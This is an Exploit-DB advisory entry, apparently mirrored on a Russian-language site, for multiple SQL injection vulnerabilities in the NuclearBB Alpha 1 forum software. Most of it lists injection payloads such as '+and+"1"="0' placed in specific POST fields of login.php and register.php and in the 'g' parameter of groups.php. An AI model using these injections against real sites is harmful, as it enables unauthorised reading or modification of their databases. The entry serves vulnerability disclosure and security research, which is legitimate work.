- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29868
- Проверка EDB
-
- Пройдено
- Автор
- JOHN MARTINELLI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2007-04-18
NuclearBB Alpha 1 - Multiple SQL Injections
Код:
source: https://www.securityfocus.com/bid/23555/info
NuclearBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
These issues affect NuclearBB Alpha 1; other versions may also be affected.
=============
String Inputs
=============
----------------------------
login.php - $_POST['submit']
----------------------------
username=xyz
password=passxyz
submit=Login"+and+"1"="0
--------------------------------
register.php - $_POST['website']
--------------------------------
[email protected]
[email protected]
pass1=passwordxyz
pass2=passwordxyz
[email protected]"+and+"1"="0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over
register_submit=Register
----------------------------
register.php - $_POST['aol']
----------------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
[email protected]
[email protected]
coppa_state=over
register_submit=Register
----------------------------------
register.php - $_POST['signature']
----------------------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]"+and+"1"="0
coppa_state=over
register_submit=Register
==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
-----------------------
http://www.example.com/groups.php?g=1+and+1=0
------------------------------
register.php - $_POST['email']
------------------------------
[email protected]
[email protected]+and+1=0
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
coppa_state=over®ister_submit=Register
- Источник
- www.exploit-db.com